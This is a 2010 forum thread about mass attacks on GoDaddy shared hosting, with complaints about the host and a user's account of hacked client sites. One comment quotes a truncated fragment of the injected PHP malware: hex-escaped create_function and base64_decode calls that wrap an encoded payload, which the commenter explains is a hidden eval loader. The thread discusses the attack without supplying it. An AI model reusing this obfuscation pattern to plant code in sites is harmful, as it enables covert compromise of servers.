Attacks on GoDaddy shared sites - insomniaboldinfoorg

dangrossman · on Nov 1, 2010

Just about every shared host is under attack at all times. Servers where thousands of people run old versions of widely used open source software (blogs, CMS's, contact forms, etc) are such easy targets for exploiting known security flaws.

Aside from not using shared hosting at all, at least don't use shared hosting provided by a domain registrar. The combination of supporting millions of customers and hosting not being their primary business means hosting MUST be treated as a commodity for them to offer it at all. They're not going to have the people bandwidth to help customers clean up their sites after they're hijacked.

uurayan · on Nov 1, 2010

As a former GoDaddy hosting customer, let me tell you all that these attacks are not new business. There was a point in May where our sites were attacked weekly with massive damage done. We would perform all the fixes they recommended yet the next day our site would be hacked to crap again. It is obviously a huge vulnerability on their side (from what I remember it was with their phpmyadmin implementation) yet all they did during this time was blame their customers saying it was security flaws in the php software installed by their customers.

Stay away from Godaddy hosting at all costs.

fseek · on Nov 1, 2010

Another one of those "mass" attacks on GoDaddy started today.

The blog doesn't give any numbers, but it seems that a few of their shared servers were compromised, so a few thousand of sites at least.

One of my clients still host in there and her files were all modified around 1pm today.

What I find unusual is the kind of code added to all PHP files:

" $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f.. \x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";.. $_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY.. "

If you decode that, it is an encoded "eval(base64_decode" to load the malware as hidden as possible.